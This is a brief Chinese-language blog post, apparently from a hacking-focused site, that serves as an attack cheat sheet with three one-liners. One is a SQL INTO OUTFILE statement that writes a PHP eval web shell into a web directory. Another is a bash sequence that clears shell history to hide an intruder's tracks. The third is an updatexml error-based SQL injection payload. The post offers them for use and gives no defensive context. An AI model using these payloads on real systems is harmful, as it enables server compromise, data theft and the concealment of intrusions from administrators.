【摘要】SQL写入一句话:select'<?phpeval($_POST[dyboy]);?>'intooutfile'd:/wwwroot/1.php';linux擦屁股一句话:cd~cat.bash_history>.hhisto...

SQL写入一句话:

select '<? php eval($_POST[dyboy]);?>' into outfile 'd:/wwwroot/1.php';

linux擦屁股一句话:

cd ~ cat .bash_history > .h history -c;history -w;cat .h > .bash_history; rm -f .h;exit

Updatexml注入:id=1 and updatexml(1,concat(0x7e,(PAYLOAD),0x7e),1)

评论(0条)

刀客源码 游客评论